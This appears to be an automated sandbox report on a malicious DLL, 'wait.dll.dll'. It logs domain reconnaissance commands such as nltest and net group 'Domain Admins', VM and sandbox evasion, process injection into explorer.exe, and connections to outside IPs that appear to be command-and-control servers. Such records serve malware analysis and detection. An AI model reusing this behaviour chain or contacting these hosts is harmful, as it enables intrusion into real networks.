Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\whoami.exe Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe Section loaded: netutils.dll
Source: C:\Windows\System32\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office
Source: wait.dll.dll Static PE information: Virtual size of .text is bigger than: 0x100000
Source: wait.dll.dll Static PE information: Image base 0x180000000 > 0x60000000
Source: wait.dll.dll Static file information: File size 2151936 > 1048576
Source: wait.dll.dll Static PE information: Raw size of .text is bigger than: 0x100000 < 0x12fe00
Source: wait.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: wait.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: wait.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: wait.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: wait.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: wait.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: wait.dll.dll Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF
Source: wait.dll.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\NvXDCore\x64\ReleaseWin7\bin\NvXDCore.pdb source: rundll32.exe, 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4538924938.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.4538185673.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp, wait.dll.dll
Source: wait.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: wait.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: wait.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: wait.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: wait.dll.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\explorer.exe Code function: 8_2_0E4589E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 8_2_0E4589E4
Source: wait.dll.dll Static PE information: real checksum: 0x1d7e57 should be: 0x216e55
Source: wait.dll.dll Static PE information: section name: .didat
Source: C:\Windows\System32\rundll32.exe Code function: 3_3_000001CEAFDF0105 push ecx; retf 3_3_000001CEAFDF010E
Source: C:\Windows\System32\rundll32.exe Code function: 4_3_0000027619780105 push ecx; retf 4_3_000002761978010E
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000002339FC40105 push ecx; retf 6_3_000002339FC4010E

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Boot Survival

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\whoami.exe whoami /groups
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\explorer.exe Code function: 8_2_0E4576DC rdtsc 8_2_0E4576DC
Source: C:\Windows\explorer.exe Code function: 8_2_0E454948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, 8_2_0E454948
Source: C:\Windows\System32\rundll32.exe Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo, 3_2_000001CEAFC94D00
Source: C:\Windows\System32\rundll32.exe Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo, 4_2_0000027619644D00
Source: C:\Windows\System32\rundll32.exe Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo, 6_2_000002339FBA4D00
Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 8_2_03038424
Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 8_2_03037274
Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 8_2_08387274
Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 8_2_08388424
Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 8_2_08857274
Source: C:\Windows\explorer.exe Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA, 8_2_08858424
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8CFDCBC WTSGetActiveConsoleSessionId,WTSEnumerateSessionsW,WTSFreeMemory,WTSQueryUserToken,GetLastError,SetupDiGetClassDevsW,GetLastError,SetupDiGetDeviceInstanceIdW,GetLastError,StrStrIW,SetupDiGetDeviceRegistryPropertyW,lstrcmpiW,CM_Get_DevNode_Status,SetupDiOpenDevRegKey,RegCloseKey,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,CloseHandle, 3_2_00007FF8A8CFDCBC
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2241
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 526
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 6837
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 879
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 876
Source: C:\Windows\System32\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\rundll32.exe API coverage: 3.7 %
Source: C:\Windows\System32\loaddll64.exe TID: 5856 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\explorer.exe TID: 6448 Thread sleep count: 2241 > 30
Source: C:\Windows\explorer.exe TID: 6448 Thread sleep time: -2241000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1276 Thread sleep count: 526 > 30
Source: C:\Windows\explorer.exe TID: 1276 Thread sleep time: -52600s >= -30000s
Source: C:\Windows\explorer.exe TID: 6448 Thread sleep count: 6837 > 30
Source: C:\Windows\explorer.exe TID: 6448 Thread sleep time: -6837000s >= -30000s
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8D72E90 swprintf,swprintf,FindFirstFileW,GetLastError,swprintf,FindNextFileW,CompareFileTime,FindNextFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,swprintf,swprintf,FindClose, 3_2_00007FF8A8D72E90
Source: C:\Windows\explorer.exe Code function: 8_2_0303A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW, 8_2_0303A8E0
Source: C:\Windows\explorer.exe Code function: 8_2_03032B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 8_2_03032B28
Source: C:\Windows\explorer.exe Code function: 8_2_030404C0 FindFirstFileW, 8_2_030404C0
Source: C:\Windows\explorer.exe Code function: 8_2_0838A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW, 8_2_0838A8E0
Source: C:\Windows\explorer.exe Code function: 8_2_083904C0 FindFirstFileW, 8_2_083904C0
Source: C:\Windows\explorer.exe Code function: 8_2_08382B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 8_2_08382B28
Source: C:\Windows\explorer.exe Code function: 8_2_0885A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW, 8_2_0885A8E0
Source: C:\Windows\explorer.exe Code function: 8_2_088604C0 FindFirstFileW, 8_2_088604C0
Source: C:\Windows\explorer.exe Code function: 8_2_08852B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 8_2_08852B28
Source: C:\Windows\explorer.exe Code function: 8_2_0E456604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 8_2_0E456604
Source: C:\Windows\explorer.exe Code function: 8_2_0E4516F4 FindFirstFileW,FindNextFileW,LoadLibraryW, 8_2_0E4516F4
Source: C:\Windows\explorer.exe Code function: 8_2_0E515C40 FindFirstFileW,FindClose, 8_2_0E515C40
Source: C:\Windows\explorer.exe Code function: 8_2_0E4F50D8 FindFirstFileA, 8_2_0E4F50D8
Source: C:\Windows\explorer.exe Code function: 8_2_0E4F5088 CloseHandle,GetCurrentProcessId,FindFirstFileA,FindClose,GetFileSize, 8_2_0E4F5088
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8CF9A80 GetSystemInfo, 3_2_00007FF8A8CF9A80
Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
Source: explorer.exe, 00000008.00000000.2321862445.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000008.00000003.3094423766.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 00000008.00000003.3857371736.000000000354D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000008.00000000.2320112731.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE44B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE44B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE44B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E1B9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000006.00000003.2511990228.000002339E1B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E1B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWf
Source: rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: explorer.exe, 00000008.00000003.3220487882.0000000008920000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000008.00000003.3102516031.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:o_
Source: explorer.exe, 00000008.00000003.3857371736.000000000354D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000008.00000000.2321862445.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000008.00000003.3857371736.000000000354D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000008.00000003.3857371736.000000000354D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000008.00000000.2320112731.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2321862445.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\explorer.exe Process information queried: ProcessInformation
Source: C:\Windows\explorer.exe Code function: 8_2_0E4576DC rdtsc 8_2_0E4576DC
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFC7CCE0 LdrGetProcedureAddress, 3_2_000001CEAFC7CCE0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8DB8990 GetLastError,IsDebuggerPresent,OutputDebugStringW, 3_2_00007FF8A8DB8990
Source: C:\Windows\explorer.exe Code function: 8_2_0E454948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, 8_2_0E454948
Source: C:\Windows\explorer.exe Code function: 8_2_0E4589E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 8_2_0E4589E4
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8D68920 swprintf,OpenMutexW,swprintf,GetProcessHeap,HeapFree, 3_2_00007FF8A8D68920
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8DCCFD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00007FF8A8DCCFD8
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00007FF8A8D96264 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00007FF8A8D96264
Source: C:\Windows\explorer.exe Code function: 8_2_0E4E1DA0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_0E4E1DA0
Source: C:\Windows\explorer.exe Code function: 8_2_0E4F53A8 SetUnhandledExceptionFilter, 8_2_0E4F53A8

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 104.21.68.89 443
Source: C:\Windows\explorer.exe Network Connect: 172.67.217.190 443
Source: C:\Windows\System32\rundll32.exe Network Connect: 103.57.249.207 6542
Source: C:\Windows\System32\rundll32.exe Network Connect: 94.232.43.224 6542
Source: C:\Windows\System32\rundll32.exe Memory allocated: C:\Windows\explorer.exe base: 3030000 protect: page execute and read and write
Source: C:\Windows\System32\rundll32.exe Memory allocated: C:\Windows\explorer.exe base: 8380000 protect: page execute and read and write
Source: C:\Windows\System32\rundll32.exe Memory allocated: C:\Windows\explorer.exe base: 8850000 protect: page execute and read and write
Source: C:\Windows\System32\rundll32.exe Code function: 3_3_00007DF4A9FC0100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 3_3_00007DF4A9FC0100
Source: C:\Windows\System32\rundll32.exe Code function: 4_3_00007DF4051C0100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 4_3_00007DF4051C0100
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_00007DF445320100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread, 6_3_00007DF445320100
Source: C:\Windows\System32\rundll32.exe Thread created: C:\Windows\explorer.exe EIP: 3030000
Source: C:\Windows\System32\rundll32.exe Thread created: C:\Windows\explorer.exe EIP: 8380000
Source: C:\Windows\System32\rundll32.exe Thread created: C:\Windows\explorer.exe EIP: 8850000
Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\explorer.exe base: 3030000 value starts with: 4D5A
Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\explorer.exe base: 8380000 value starts with: 4D5A
Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\explorer.exe base: 8850000 value starts with: 4D5A
Source: C:\Windows\System32\rundll32.exe Memory written: PID: 1028 base: 3030000 value: 4D
Source: C:\Windows\System32\rundll32.exe Memory written: PID: 1028 base: 8380000 value: 4D
Source: C:\Windows\System32\rundll32.exe Memory written: PID: 1028 base: 8850000 value: 4D
Source: C:\Windows\System32\rundll32.exe Thread register set: target process: 412
Source: C:\Windows\System32\rundll32.exe Thread register set: target process: 4084
Source: C:\Windows\System32\rundll32.exe Thread register set: 412 1
Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\explorer.exe base: 3030000
Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\explorer.exe base: 8380000
Source: C:\Windows\System32\rundll32.exe Memory written: C:\Windows\explorer.exe base: 8850000
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\wait.dll.dll",#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
